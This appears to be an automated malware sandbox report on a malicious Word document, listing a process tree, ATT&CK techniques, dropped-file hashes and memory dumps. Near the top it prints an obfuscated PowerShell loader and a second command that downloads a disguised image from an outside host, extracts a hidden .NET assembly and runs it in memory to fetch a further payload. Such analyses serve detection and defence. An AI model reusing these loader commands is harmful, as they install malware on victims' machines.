⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫D0∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫Gk∵ ㎣ ⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫Gc∵ ㎣ ⇍ ⟂ ⤫ZQBU∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫e∵ ㎣ ⇍ ⟂ ⤫B0∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫UwB1∵ ㎣ ⇍ ⟂ ⤫GI∵ ㎣ ⇍ ⟂ ⤫cwB0∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫aQBu∵ ㎣ ⇍ ⟂ ⤫Gc∵ ㎣ ⇍ ⟂ ⤫K∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BJ∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫Hg∵ ㎣ ⇍ ⟂ ⤫L∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫YgBh∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫ZQ∵ ㎣ ⇍ ⟂ ⤫2∵ ㎣ ⇍ ⟂ ⤫DQ∵ ㎣ ⇍ ⟂ ⤫T∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫ZwB0∵ ㎣ ⇍ ⟂ ⤫Gg∵ ㎣ ⇍ ⟂ ⤫KQ∵ ㎣ ⇍ ⟂ ⤫7∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫YwBv∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫BC∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫9∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫WwBT∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫cwB0∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bQ∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫EM∵ ㎣ ⇍ ⟂ ⤫bwBu∵ ㎣ ⇍ ⟂ ⤫HY∵ ㎣ ⇍ ⟂ ⤫ZQBy∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫XQ∵ ㎣ ⇍ ⟂ ⤫6∵ ㎣ ⇍ ⟂ ⤫Do∵ ㎣ ⇍ ⟂ ⤫RgBy∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫bQBC∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫cwBl∵ ㎣ ⇍ ⟂ ⤫DY∵ ㎣ ⇍ ⟂ ⤫N∵ ㎣ ⇍ ⟂ ⤫BT∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫cgBp∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Zw∵ ㎣ ⇍ ⟂ ⤫o∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫YgBh∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫ZQ∵ ㎣ ⇍ ⟂ ⤫2∵ ㎣ ⇍ ⟂ ⤫DQ∵ ㎣ ⇍ ⟂ ⤫QwBv∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫p∵ ㎣ ⇍ ⟂ ⤫Ds∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫Bs∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫YQBk∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫BB∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫cwBl∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫YgBs∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫9∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫WwBT∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫cwB0∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bQ∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫FI∵ ㎣ ⇍ ⟂ ⤫ZQBm∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫ZQBj∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫aQBv∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫LgBB∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫cwBl∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫YgBs∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫XQ∵ ㎣ ⇍ ⟂ ⤫6∵ ㎣ ⇍ ⟂ ⤫Do∵ ㎣ ⇍ ⟂ ⤫T∵ ㎣ ⇍ ⟂ ⤫Bv∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫o∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫YwBv∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫BC∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫KQ∵ ㎣ ⇍ ⟂ ⤫7∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫B5∵ ㎣ ⇍ ⟂ ⤫H∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫ZQ∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫D0∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫bwBh∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQBk∵ ㎣ ⇍ ⟂ ⤫EE∵ ㎣ ⇍ ⟂ ⤫cwBz∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bQBi∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫eQ∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫Ec∵ ㎣ ⇍ ⟂ ⤫ZQB0∵ ㎣ ⇍ ⟂ ⤫FQ∵ ㎣ ⇍ ⟂ ⤫eQBw∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫K∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫n∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫bgBs∵ ㎣ ⇍ ⟂ ⤫Gk∵ ㎣ ⇍ ⟂ ⤫Yg∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫Ek∵ ㎣ ⇍ ⟂ ⤫Tw∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫Eg∵ ㎣ ⇍ ⟂ ⤫bwBt∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫p∵ ㎣ ⇍ ⟂ ⤫Ds∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫Bt∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bo∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫D0∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫eQBw∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫LgBH∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BN∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bo∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫o∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫VgBB∵ ㎣ ⇍ ⟂ ⤫Ek∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫p∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫SQBu∵ ㎣ ⇍ ⟂ ⤫HY∵ ㎣ ⇍ ⟂ ⤫bwBr∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫K∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫dQBs∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫L∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫Fs∵ ㎣ ⇍ ⟂ ⤫bwBi∵ ㎣ ⇍ ⟂ ⤫Go∵ ㎣ ⇍ ⟂ ⤫ZQBj∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫WwBd∵ ㎣ ⇍ ⟂ ⤫F0∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫o∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫B4∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫LgBD∵ ㎣ ⇍ ⟂ ⤫EI∵ ㎣ ⇍ ⟂ ⤫QgBL∵ ㎣ ⇍ ⟂ ⤫C8∵ ㎣ ⇍ ⟂ ⤫dgBi∵ ㎣ ⇍ ⟂ ⤫Gs∵ ㎣ ⇍ ⟂ ⤫LwBw∵ ㎣ ⇍ ⟂ ⤫H∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫Hg∵ ㎣ ⇍ ⟂ ⤫Lw∵ ㎣ ⇍ ⟂ ⤫4∵ ㎣ ⇍ ⟂ ⤫DQ∵ ㎣ ⇍ ⟂ ⤫MQ∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫DE∵ ㎣ ⇍ ⟂ ⤫MQ∵ ㎣ ⇍ ⟂ ⤫x∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫Mw∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫DI∵ ㎣ ⇍ ⟂ ⤫OQ∵ ㎣ ⇍ ⟂ ⤫x∵ ㎣ ⇍ ⟂ ⤫C8∵ ㎣ ⇍ ⟂ ⤫Lw∵ ㎣ ⇍ ⟂ ⤫6∵ ㎣ ⇍ ⟂ ⤫H∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫B0∵ ㎣ ⇍ ⟂ ⤫Gg∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫Cw∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫n∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQBz∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫HY∵ ㎣ ⇍ ⟂ ⤫YQBk∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫Cw∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫n∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQBz∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫HY∵ ㎣ ⇍ ⟂ ⤫YQBk∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫Cw∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫n∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQBz∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫HY∵ ㎣ ⇍ ⟂ ⤫YQBk∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫s∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫UgBl∵ ㎣ ⇍ ⟂ ⤫Gc∵ ㎣ ⇍ ⟂ ⤫QQBz∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫s∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫Jw∵ ㎣ ⇍ ⟂ ⤫p∵ ㎣ ⇍ ⟂ ⤫Ck∵ ㎣ ⇍ ⟂ ⤫';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('∵ ㎣ ⇍ ⟂ ⤫','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CBBK/vbk/ppmax/841.111.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
3c20041b636ceb5bf376883e0293e43d

SHA1
2eed3f07dddf01ceddc516c48cd9d03a5000fe3e

SHA256
cdd4fa30942b6d133d2962a5b96eed03b00f9de642493dcdb375dc5b133f1c10

SHA512
9b374bbdf607431f7724ba7be147b16f8dc24d598015f8058a13378d5a7110793b71308e1928dd993e873a7935bcf3b87ef2da5433c4f1874ebfc68dba4d7ac2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b48e27d7a2890afd69ccb0b2d3583468

SHA1
49ffb2264b9c8ed2b1df525924641d27d7afd3ab

SHA256
951b4879904e8ce7b5ac7e7fce7907fcb638d467c3f95515b913c09d5b9afbd3

SHA512
8cbee3370bf070976b3843ddf6839ddcddcd2db14a270c340a8d98bdb45052270d4a7632e7fdb7c72cec197f4012b3711ebf52d03601c2ffd9e4c6ca32429f46

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
11f311a208704f3381c48d51f8c31a79

SHA1
896f4a6a83bfc8d3f2b36eea7a9f68f1d2a0c2cb

SHA256
35405dda6291999edc18284b230a0db76bd64023242e5bc5f3e001230b190a4e

SHA512
79a62a50c8eeac90fda1d87c666c9ceedb2a90b63fa8462d0edcc41600c4c28215ca7d6624baa91146aab856bb4600e0311b24145daf8492bf5a0eff3a78a8ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{39B7F23D-4E25-466D-8230-B460B184826D}.FSD

Filesize
128KB

MD5
f3563a187516b35edae092a19486ca17

SHA1
d0ecaa0fae2f2bb1fff9e2ac7ec45194947147a8

SHA256
2e2cc65b22c0279ba9819f67b480d6bbc167e3bd4b373d6e4654cb3dd29fabbd

SHA512
19ca5984f262e16f47f320b616b9b13bc32758527accd5bce0c70dadc8d42f9bb8a710098af6f7f7af880165b78fa16035eb3ba43dcc186451601c9e97cabd6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
228d662a80e75bdba2b8e3593bd991cb

SHA1
52060fd73bd80bc1c45f9cd35d703212f35140fc

SHA256
769d73763df84094a3b1827acf6dd88c1ddc27ff1a7b9b17439c754fb084db29

SHA512
0169924fc15dab039c0db77ade21d0b19d2d480bdc67e39157f8136da8d189327ba6a94c38530075b952f88b54d1da06799cbe5e0d98ff0110b17b0b07f7cb84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6F72423B-CC12-43A4-801F-C24CF51AC7C7}.FSD

Filesize
128KB

MD5
6b81bc243032dd2a5254a956f9d10b28

SHA1
d647aee74a30056ca09dcb7dd1f96aff890c7375

SHA256
6f397dc37d9b11b609ed2710dfa3ae40e45d85762a04acba2feb837b32829b90

SHA512
64c65d55595dc6d8c9933a0dd089b3dcc9c3a0e4ad1d011775641331ccf55e714fca7a3f6e14b8a4fc47f6d4ee496bfbd0b97c10389d3e92ad1746885580b79b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\yummysilkybutterbuncamewithchocolatefalovrwhicheverygirllovesthechocolatebuttersmoothbunheristhebuninformation________sheismygirlalways[1].doc

Filesize
82KB

MD5
ed3c59a3e67a8803a62bb3ca27c9ad31

SHA1
08cbf58c031edfba2164838d2bd75a931fc8fb3a

SHA256
1785a0fe2a6d1760e4ac22c6eae7eda96328ea1544ce6c32dd05fb56d86729ab

SHA512
016bb5e530ed714311df38526258c982a82a9d9e1e508c26f3de04ff926b607efde7bb1a450cb80af5fe58562cd204a72d4e8011195ffc2b143f242622ac9bfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabCBA9.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{5F4985B1-7277-4761-8DEC-250F3C1E24E8}

Filesize
128KB

MD5
6159194bc8a1b1d72db1ad13365cb168

SHA1
38cfe4ecc16ef32c93a3e283f3c3fc26247bcfb6

SHA256
0e315c2bfc2804e259a9238bcab956517680ebc9edd02c11171f3c44531f8281

SHA512
cbd153c1a62dafc85e63676796300e2051430f68d5acdc129507227d5456c13040af8f08e53b9e039beac66f56d4371cb3c70d8c42eeba12dce4ea642ec2656c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
372B

MD5
acf5d2f2ab82ccf5170a25edddba1ba7

SHA1
1da9f9bda257bb3032e7f95ba68fd35ebe1c5038

SHA256
d764283c164ecba8d157e49df23a46fad53fd32fafa218fd977fd6df70719d19

SHA512
29b9b69040d5eec8dac84ee3d595ac9d22c8837601ce5ca79dfe9180ec7328eec60f7f87dd1b660207892730f7a8a133917956f6c9c0c8ae4590932be7a03d6d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
1034724e40f55f0ec78bf1dfc1f3ada1

SHA1
da4ba987a0278dd2b75c4a221199331ff063fa5e

SHA256
fd1daff01ca8cdb6a8579f82df9c7d0e47fd039128d0ec54c31eccca7494dc4a

SHA512
aeaf29060f24f009f18217ee33dc9090ef9cf7b94ea75d2e9ea7a5df0318cc93fd4866ec2d8ffa8859b7227ed7ca292530c4a8e2a24463c20a7b8a4eb8a338ce

Download Submit
C:\Users\Admin\AppData\Roaming\yummysweetbutterbunlipsonhe.vBS

Filesize
179KB

MD5
5dfe754cec96b83b86cd4cbc339bc30e

SHA1
c21638851351d8dbd07e69a2f056111b26fa50fb

SHA256
a12bcbf578dffec99e36cfeeefd00c70e93ed4c31635c5ce35f68684f235c22e

SHA512
bcb6741547a372d58a3899266152500886574d5e3d12e17487d7191074b99be547d29495795b38ad4b2f59d7bcac0511f1905f18c633ee35a7fc6df9484cc1c8

Download Submit
memory/1644-1-0x000000007282D000-0x0000000072838000-memory.dmp

Filesize
44KB

Download
memory/1644-94-0x000000007282D000-0x0000000072838000-memory.dmp

Filesize
44KB

Download
memory/1644-23-0x00000000006C0000-0x00000000006C2000-memory.dmp

Filesize
8KB

Download
memory/1644-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1644-143-0x000000007282D000-0x0000000072838000-memory.dmp

Filesize
44KB

Download
memory/3020-18-0x000000002FE11000-0x000000002FE12000-memory.dmp

Filesize
4KB

Download
memory/3020-22-0x0000000003790000-0x0000000003792000-memory.dmp

Filesize
8KB

Download
memory/3020-101-0x000000007282D000-0x0000000072838000-memory.dmp

Filesize
44KB

Download
memory/3020-20-0x000000007282D000-0x0000000072838000-memory.dmp

Filesize
44KB

Download
memory/3020-138-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3020-139-0x000000007282D000-0x0000000072838000-memory.dmp

Filesize
44KB

Download